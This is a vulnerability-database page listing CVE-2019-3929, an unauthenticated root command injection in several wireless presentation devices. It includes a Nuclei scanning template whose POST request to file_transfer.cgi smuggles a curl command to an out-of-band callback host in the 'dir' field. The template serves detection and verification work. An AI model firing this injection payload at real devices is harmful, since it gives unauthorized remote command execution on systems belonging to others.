Lucene search

ProjectDiscoveryNUCLEI:CVE-2019-3929

HistoryNov 05, 2021 - 3:28 p.m.

Barco/AWIND OEM Presentation Platform - Remote Command Injection

2021-11-0515:28:18

ProjectDiscovery

github.com

barco

awind

presentation platform

remote command injection

crestron

barco wepresent

extron sharelink

teq av it

sharp

optoma wps-pro

blackbox hd wps

infocus liteshow3

infocus liteshow4

vulnerability

command injection

unauthenticated attacker

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON

The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.

id: CVE-2019-3929

info:
  name: Barco/AWIND OEM Presentation Platform - Remote Command Injection
  author: _0xf4n9x_
  severity: critical
  description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
    - https://www.exploit-db.com/exploits/46786/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3929
    - https://www.tenable.com/security/research/tra-2019-20
    - http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-3929
    cwe-id: CWE-78,CWE-79
    epss-score: 0.97363
    epss-percentile: 0.99899
    cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: crestron
    product: am-100_firmware
  tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/file_transfer.cgi"

    body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022074632ab5f2a59cca98e6284bb1dd461c9d89bfbd5717e20f50733c4957b65a6a0221008db0aa0589332b13150c47886b51460d3ba6afa7cdfe8c497f56f5282ef779a9:922c64590222798bb761d5b6d8e72950